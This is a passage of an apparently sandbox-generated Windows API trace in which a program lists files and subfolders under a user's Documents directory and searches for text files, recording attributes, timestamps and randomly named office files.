lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc1a0f60e, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bc4716, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0067.796] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0067.796] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa87f514a, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xddc1fe1e, ftLastWriteTime.dwHighDateTime=0x1d327c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0067.796] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3aadc160, ftCreationTime.dwHighDateTime=0x1d574eb, ftLastAccessTime.dwLowDateTime=0xe2f72c30, ftLastAccessTime.dwHighDateTime=0x1d5a19b, ftLastWriteTime.dwLowDateTime=0xe2f72c30, ftLastWriteTime.dwHighDateTime=0x1d5a19b, nFileSizeHigh=0x0, nFileSizeLow=0xa07d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oXBXXG.xlsx", cAlternateFileName="OXBXXG~1.XLS")) returned 1 [0067.796] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9d6fa90, ftCreationTime.dwHighDateTime=0x1d59068, ftLastAccessTime.dwLowDateTime=0xb8a31ad0, ftLastAccessTime.dwHighDateTime=0x1d5b4cd, ftLastWriteTime.dwLowDateTime=0xb8a31ad0, ftLastWriteTime.dwHighDateTime=0x1d5b4cd, nFileSizeHigh=0x0, nFileSizeLow=0x17685, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qf_lD4ykVY6P7.pptx", cAlternateFileName="QF_LD4~1.PPT")) returned 1 [0067.796] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39cd50b0, ftCreationTime.dwHighDateTime=0x1d5b39a, ftLastAccessTime.dwLowDateTime=0xe8718a90, ftLastAccessTime.dwHighDateTime=0x1d59956, ftLastWriteTime.dwLowDateTime=0xe8718a90, ftLastWriteTime.dwHighDateTime=0x1d59956, nFileSizeHigh=0x0, nFileSizeLow=0x13fe5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RRwZ.xlsx", cAlternateFileName="RRWZ~1.XLS")) returned 1 [0067.796] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22b9b4e0, ftCreationTime.dwHighDateTime=0x1d58feb, ftLastAccessTime.dwLowDateTime=0x63d44870, ftLastAccessTime.dwHighDateTime=0x1d5697e, ftLastWriteTime.dwLowDateTime=0x63d44870, ftLastWriteTime.dwHighDateTime=0x1d5697e, nFileSizeHigh=0x0, nFileSizeLow=0x4e15, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tMLcqE8DzcE8ZL.xlsx", cAlternateFileName="TMLCQE~1.XLS")) returned 1 [0067.796] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15d0d200, ftCreationTime.dwHighDateTime=0x1d5d667, ftLastAccessTime.dwLowDateTime=0x5ecd6570, ftLastAccessTime.dwHighDateTime=0x1d5cba1, ftLastWriteTime.dwLowDateTime=0x5ecd6570, ftLastWriteTime.dwHighDateTime=0x1d5cba1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uhe R_MajVPhj", cAlternateFileName="UHER_M~1")) returned 1 [0067.796] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fd8d4f0, ftCreationTime.dwHighDateTime=0x1d5cfda, ftLastAccessTime.dwLowDateTime=0xa8779d00, ftLastAccessTime.dwHighDateTime=0x1d5cf8c, ftLastWriteTime.dwLowDateTime=0xa8779d00, ftLastWriteTime.dwHighDateTime=0x1d5cf8c, nFileSizeHigh=0x0, nFileSizeLow=0x318d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wdchYxA7KRrFzTiR.odp", cAlternateFileName="WDCHYX~1.ODP")) returned 1 [0067.796] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa27a2b70, ftCreationTime.dwHighDateTime=0x1d55c8c, ftLastAccessTime.dwLowDateTime=0x9a3a18f0, ftLastAccessTime.dwHighDateTime=0x1d5964b, ftLastWriteTime.dwLowDateTime=0x9a3a18f0, ftLastWriteTime.dwHighDateTime=0x1d5964b, nFileSizeHigh=0x0, nFileSizeLow=0x454e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wrMr9 Fyz8.docx", cAlternateFileName="WRMR9F~1.DOC")) returned 1 [0067.796] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92262400, ftCreationTime.dwHighDateTime=0x1d5cea0, ftLastAccessTime.dwLowDateTime=0xb656bcb0, ftLastAccessTime.dwHighDateTime=0x1d5d380, ftLastWriteTime.dwLowDateTime=0xb656bcb0, ftLastWriteTime.dwHighDateTime=0x1d5d380, nFileSizeHigh=0x0, nFileSizeLow=0x7a39, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xocV7C6c.odp", cAlternateFileName="")) returned 1 [0067.796] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7918cd20, ftCreationTime.dwHighDateTime=0x1d58899, ftLastAccessTime.dwLowDateTime=0x8958970, ftLastAccessTime.dwHighDateTime=0x1d558cf, ftLastWriteTime.dwLowDateTime=0x8958970, ftLastWriteTime.dwHighDateTime=0x1d558cf, nFileSizeHigh=0x0, nFileSizeLow=0xf74c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XTyOBM6VZ0m.pptx", cAlternateFileName="XTYOBM~1.PPT")) returned 1 [0067.796] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86845f50, ftCreationTime.dwHighDateTime=0x1d5c297, ftLastAccessTime.dwLowDateTime=0x315a7740, ftLastAccessTime.dwHighDateTime=0x1d5cc50, ftLastWriteTime.dwLowDateTime=0x315a7740, ftLastWriteTime.dwHighDateTime=0x1d5cc50, nFileSizeHigh=0x0, nFileSizeLow=0x10984, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YBBoLDeAtb.docx", cAlternateFileName="YBBOLD~1.DOC")) returned 1 [0067.796] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x282d2360, ftCreationTime.dwHighDateTime=0x1d5d750, ftLastAccessTime.dwLowDateTime=0xa72068e0, ftLastAccessTime.dwHighDateTime=0x1d5ca93, ftLastWriteTime.dwLowDateTime=0xa72068e0, ftLastWriteTime.dwHighDateTime=0x1d5ca93, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zxF6sHlM0JaF", cAlternateFileName="ZXF6SH~1")) returned 1 [0067.796] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd1ad9f0, ftCreationTime.dwHighDateTime=0x1d56740, ftLastAccessTime.dwLowDateTime=0xdb3b54e0, ftLastAccessTime.dwHighDateTime=0x1d5cd64, ftLastWriteTime.dwLowDateTime=0xdb3b54e0, ftLastWriteTime.dwHighDateTime=0x1d5cd64, nFileSizeHigh=0x0, nFileSizeLow=0x5c0d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_wc0ld1_h 9LSGLE.xlsx", cAlternateFileName="_WC0LD~1.XLS")) returned 1 [0067.796] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd1ad9f0, ftCreationTime.dwHighDateTime=0x1d56740, ftLastAccessTime.dwLowDateTime=0xdb3b54e0, ftLastAccessTime.dwHighDateTime=0x1d5cd64, ftLastWriteTime.dwLowDateTime=0xdb3b54e0, ftLastWriteTime.dwHighDateTime=0x1d5cd64, nFileSizeHigh=0x0, nFileSizeLow=0x5c0d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_wc0ld1_h 9LSGLE.xlsx", cAlternateFileName="_WC0LD~1.XLS")) returned 0 [0067.796] FindClose (in: hFindFile=0x9bef00 | out: hFindFile=0x9bef00) returned 1 [0067.796] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\*.txt", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0067.796] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Mpp4LjR5L7\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc92a3740, ftCreationTime.dwHighDateTime=0x1d5cff2, ftLastAccessTime.dwLowDateTime=0x9529bd80, ftLastAccessTime.dwHighDateTime=0x1d5cc23, ftLastWriteTime.dwLowDateTime=0x9529bd80, ftLastWriteTime.dwHighDateTime=0x1d5cc23, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bea80 [0067.797] FindNextFileW (in: hFindFile=0x9bea80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc92a3740, ftCreationTime.dwHighDateTime=0x1d5cff2, ftLastAccessTime.dwLowDateTime=0x9529bd80, ftLastAccessTime.dwHighDateTime=0x1d5cc23, ftLastWriteTime.dwLowDateTime=0x9529bd80, ftLastWriteTime.dwHighDateTime=0x1d5cc23, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.797] FindNextFileW (in: hFindFile=0x9bea80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xde4ce120, ftCreationTime.dwHighDateTime=0x1d5ce55, ftLastAccessTime.dwLowDateTime=0x1244e270, ftLastAccessTime.dwHighDateTime=0x1d5d7e3, ftLastWriteTime.dwLowDateTime=0x1244e270, ftLastWriteTime.dwHighDateTime=0x1d5d7e3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bkBh5", cAlternateFileName="")) returned 1 [0067.797] FindNextFileW (in: hFindFile=0x9bea80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ed55d0, ftCreationTime.dwHighDateTime=0x1d5d11c, ftLastAccessTime.dwLowDateTime=0x6c81a2d0, ftLastAccessTime.dwHighDateTime=0x1d5d3ee, ftLastWriteTime.dwLowDateTime=0x6c81a2d0, ftLastWriteTime.dwHighDateTime=0x1d5d3ee, nFileSizeHigh=0x0, nFileSizeLow=0x13dab, dwReserved0=0x0, dwReserved1=0x0, cFileName="fVi 2i7ASSTMoS8P9w7L.xlsx", cAlternateFileName="FVI2I7~1.XLS")) returned 1 [0067.797] FindNextFileW (in: hFindFile=0x9bea80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x55b088a0, ftCreationTime.dwHighDateTime=0x1d5c935, ftLastAccessTime.dwLowDateTime=0x284a7d00, ftLastAccessTime.dwHighDateTime=0x1d5d66c, ftLastWriteTime.dwLowDateTime=0x284a7d00, ftLastWriteTime.dwHighDateTime=0x1d5d66c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J5_j1zUimxGe_9", cAlternateFileName="J5_J1Z~1")) returned 1 [0067.797] FindNextFileW (in: hFindFile=0x9bea80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44112fb0, ftCreationTime.dwHighDateTime=0x1d5d302, ftLastAccessTime.dwLowDateTime=0x997f50f0, ftLastAccessTime.dwHighDateTime=0x1d5caef, ftLastWriteTime.dwLowDateTime=0x997f50f0, ftLastWriteTime.dwHighDateTime=0x1d5caef, nFileSizeHigh=0x0, nFileSizeLow=0x11a80, dwReserved0=0x0, dwReserved1=0x0, cFileName="vYbPg.csv", cAlternateFileName="")) returned 1 [0067.797] FindNextFileW (in: hFindFile=0x9bea80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44112fb0, ftCreationTime.dwHighDateTime=0x1d5d302, ftLastAccessTime.dwLowDateTime=0x997f50f0, ftLastAccessTime.dwHighDateTime=0x1d5caef, ftLastWriteTime.dwLowDateTime=0x997f50f0, ftLastWriteTime.dwHighDateTime=0x1d5caef, nFileSizeHigh=0x0, nFileSizeLow=0x11a80, dwReserved0=0x0, dwReserved1=0x0, cFileName="vYbPg.csv", cAlternateFileName="")) returned 0 [0067.797] FindClose (in: hFindFile=0x9bea80 | out: hFindFile=0x9bea80) returned 1 [0067.797] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Mpp4LjR5L7\\*.txt", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0067.797] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Mpp4LjR5L7\\bkBh5\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xde4ce120, ftCreationTime.dwHighDateTime=0x1d5ce55, ftLastAccessTime.dwLowDateTime=0x1244e270, ftLastAccessTime.dwHighDateTime=0x1d5d7e3, ftLastWriteTime.dwLowDateTime=0x1244e270, ftLastWriteTime.dwHighDateTime=0x1d5d7e3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bf380 [0067.797] FindNextFileW (in: hFindFile=0x9bf380, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xde4ce120, ftCreationTime.dwHighDateTime=0x1d5ce55, ftLastAccessTime.dwLowDateTime=0x1244e270, ftLastAccessTime.dwHighDateTime=0x1d5d7e3, ftLastWriteTime.dwLowDateTime=0x1244e270, ftLastWriteTime.dwHighDateTime=0x1d5d7e3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.798] FindNextFileW (in: hFindFile=0x9bf380, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec8f33f0, ftCreationTime.dwHighDateTime=0x1d5d5c1, ftLastAccessTime.dwLowDateTime=0x2d0aa730, ftLastAccessTime.dwHighDateTime=0x1d5cde7, ftLastWriteTime.dwLowDateTime=0x2d0aa730, ftLastWriteTime.dwHighDateTime=0x1d5cde7, nFileSizeHigh=0x0, nFileSizeLow=0xc2d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="4nD9KyWIOt2tlTqfJ1so.pdf", cAlternateFileName="4ND9KY~1.PDF")) returned 1 [0067.798] FindNextFileW (in: hFindFile=0x9bf380, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a368160, ftCreationTime.dwHighDateTime=0x1d5caee, ftLastAccessTime.dwLowDateTime=0x9e4c8310, ftLastAccessTime.dwHighDateTime=0x1d5cda5, ftLastWriteTime.dwLowDateTime=0x9e4c8310, ftLastWriteTime.dwHighDateTime=0x1d5cda5, nFileSizeHigh=0x0, nFileSizeLow=0x598b, dwReserved0=0x0, dwReserved1=0x0, cFileName="EFG 4B.odp", cAlternateFileName="EFG4B~1.ODP")) returned 1 [0067.798] FindNextFileW (in: hFindFile=0x9bf380, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c6321f0, ftCreationTime.dwHighDateTime=0x1d5cdd3, ftLastAccessTime.dwLowDateTime=0xce93dfd0, ftLastAccessTime.dwHighDateTime=0x1d5cd6b, ftLastWriteTime.dwLowDateTime=0xce93dfd0, ftLastWriteTime.dwHighDateTime=0x1d5cd6b, nFileSizeHigh=0x0, nFileSizeLow=0x534f, dwReserved0=0x0, dwReserved1=0x0, cFileName="j9WV3ln7HE.ppt", cAlternateFileName="J9WV3L~1.PPT")) returned 1 [0067.798] FindNextFileW (in: hFindFile=0x9bf380, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde951230, ftCreationTime.dwHighDateTime=0x1d5cceb, ftLastAccessTime.dwLowDateTime=0x5b3cf0f0, ftLastAccessTime.dwHighDateTime=0x1d5cd3c, ftLastWriteTime.dwLowDateTime=0x5b3cf0f0, ftLastWriteTime.dwHighDateTime=0x1d5cd3c, nFileSizeHigh=0x0, nFileSizeLow=0x12ccd, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vi3Zvt7sxTX.pps", cAlternateFileName="VI3ZVT~1.PPS")) returned 1 [0067.798] FindNextFileW (in: hFindFile=0x9bf380, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4510c90, ftCreationTime.dwHighDateTime=0x1d5ca07, ftLastAccessTime.dwLowDateTime=0xb8c6fa90, ftLastAccessTime.dwHighDateTime=0x1d5cc47, ftLastWriteTime.dwLowDateTime=0xb8c6fa90, ftLastWriteTime.dwHighDateTime=0x1d5cc47, nFileSizeHigh=0x0, nFileSizeLow=0xd65d, dwReserved0=0x0, dwReserved1=0x0, cFileName="w_SRbsVS.pptx", cAlternateFileName="W_SRBS~1.PPT")) returned 1 [0067.798] FindNextFileW (in: hFindFile=0x9bf380, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa052a8f0, ftCreationTime.dwHighDateTime=0x1d5cb58, ftLastAccessTime.dwLowDateTime=0x56da1d30, ftLastAccessTime.dwHighDateTime=0x1d5c7c4, ftLastWriteTime.dwLowDateTime=0x56da1d30, ftLastWriteTime.dwHighDateTime=0x1d5c7c4, nFileSizeHigh=0x0, nFileSizeLow=0x1d28, dwReserved0=0x0, dwReserved1=0x0, cFileName="YdOw3.docx", cAlternateFileName="YDOW3~1.DOC")) returned 1 [0067.798] FindNextFileW (in: hFindFile=0x9bf380, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa052a8f0, ftCreationTime.dwHighDateTime=0x1d5cb58, ftLastAccessTime.dwLowDateTime=0x56da1d30, ftLastAccessTime.dwHighDateTime=0x1d5c7c4, ftLastWriteTime.dwLowDateTime=0x56da1d30, ftLastWriteTime.dwHighDateTime=0x1d5c7c4, nFileSizeHigh=0x0, nFileSizeLow=0x1d28, dwReserved0=0x0, dwReserved1=0x0, cFileName="YdOw3.docx", cAlternateFileName="YDOW3~1.DOC")) returned 0 [0067.798] FindClose (in: hFindFile=0x9bf380 | out: hFindFile=0x9bf380) returned 1 [0067.798] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Mpp4LjR5L7\\bkBh5\\*.txt", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0067.798] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Mpp4LjR5L7\\J5_j1zUimxGe_9\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x55b088a0, ftCreationTime.dwHighDateTime=0x1d5c935, ftLastAccessTime.dwLowDateTime=0x284a7d00, ftLastAccessTime.dwHighDateTime=0x1d5d66c, ftLastWriteTime.dwLowDateTime=0x284a7d00, ftLastWriteTime.dwHighDateTime=0x1d5d66c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bf380 [0067.798] FindNextFileW (in: hFindFile=0x9bf380, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x55b088a0, ftCreationTime.dwHighDateTime=0x1d5c935, ftLastAccessTime.dwLowDateTime=0x284a7d00, ftLastAccessTime.dwHighDateTime=0x1d5d66c, ftLastWriteTime.dwLowDateTime=0x284a7d00, ftLastWriteTime.dwHighDateTime=0x1d5d66c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.798] FindNextFileW (in: hFindFile=0x9bf380, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c4ec5d0, ftCreationTime.dwHighDateTime=0x1d5cc42, ftLastAccessTime.dwLowDateTime=0xe6a3e170, ftLastAccessTime.dwHighDateTime=0x1d5d0b7, ftLastWriteTime.dwLowDateTime=0xe6a3e170, ftLastWriteTime.dwHighDateTime=0x1d5d0b7, nFileSizeHigh=0x0, nFileSizeLow=0xa2dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="5IrWUVwbhj.ppt", cAlternateFileName="5IRWUV~1.PPT")) returned 1 [0067.798] FindNextFileW (in: hFindFile=0x9bf380, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe38df410, ftCreationTime.dwHighDateTime=0x1d5d587, ftLastAccessTime.dwLowDateTime=0x3c119ab0, ftLastAccessTime.dwHighDateTime=0x1d5c83b, ftLastWriteTime.dwLowDateTime=0x3c119ab0, ftLastWriteTime.dwHighDateTime=0x1d5c83b, nFileSizeHigh=0x0, nFileSizeLow=0xae7, dwReserved0=0x0, dwReserved1=0x0, cFileName="elz8sQ1H3S Z.doc", cAlternateFileName="ELZ8SQ~1.DOC")) returned 1 [0067.798] FindNextFileW (in: hFindFile=0x9bf380, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdcc49640, ftCreationTime.dwHighDateTime=0x1d5c92d, ftLastAccessTime.dwLowDateTime=0x4f01a310, ftLastAccessTime.dwHighDateTime=0x1d5c7d0, ftLastWriteTime.dwLowDateTime=0x4f01a310, ftLastWriteTime.dwHighDateTime=0x1d5c7d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="foWZPFNPU", cAlternateFileName="FOWZPF~1")) returned 1 [0067.798] FindNextFileW (in: hFindFile=0x9bf380, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x524744c0, ftCreationTime.dwHighDateTime=0x1d5c91b, ftLastAccessTime.dwLowDateTime=0x474a4500, ftLastAccessTime.dwHighDateTime=0x1d5cb8b, ftLastWriteTime.dwLowDateTime=0x474a4500, ftLastWriteTime.dwHighDateTime=0x1d5cb8b, nFileSizeHigh=0x0, nFileSizeLow=0xa5a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="LWeuCWXKJj9F78y4.xlsx", cAlternateFileName="LWEUCW~1.XLS")) returned 1 [0067.799] FindNextFileW (in: hFindFile=0x9bf380, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a498220, ftCreationTime.dwHighDateTime=0x1d5ca7c, ftLastAccessTime.dwLowDateTime=0x3f384440, ftLastAccessTime.dwHighDateTime=0x1d5d13d, ftLastWriteTime.dwLowDateTime=0x3f384440, ftLastWriteTime.dwHighDateTime=0x1d5d13d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="N3USsHs", cAlternateFileName="")) returned 1 [0067.799] FindNextFileW (in: hFindFile=0x9bf380, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa5c260, ftCreationTime.dwHighDateTime=0x1d5d6b0, ftLastAccessTime.dwLowDateTime=0x95a99730, ftLastAccessTime.dwHighDateTime=0x1d5caf7, ftLastWriteTime.dwLowDateTime=0x95a99730, ftLastWriteTime.dwHighDateTime=0x1d5caf7, nFileSizeHigh=0x0, nFileSizeLow=0xafa5, dwReserved0=0x0, dwReserved1=0x0, cFileName="zPVi4W3vW.pptx", cAlternateFileName="ZPVI4W~1.PPT")) returned 1 [0067.799] FindNextFileW (in: hFindFile=0x9bf380, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa5c260, ftCreationTime.dwHighDateTime=0x1d5d6b0, ftLastAccessTime.dwLowDateTime=0x95a99730, ftLastAccessTime.dwHighDateTime=0x1d5caf7, ftLastWriteTime.dwLowDateTime=0x95a99730, ftLastWriteTime.dwHighDateTime=0x1d5caf7, nFileSizeHigh=0x0, nFileSizeLow=0xafa5, dwReserved0=0x0, dwReserved1=0x0, cFileName="zPVi4W3vW.pptx", cAlternateFileName="ZPVI4W~1.PPT")) returned 0 [0067.799] FindClose (in: hFindFile=0x9bf380 | out: hFindFile=0x9bf380) returned 1 [0067.799] FindFirstFileW (in: 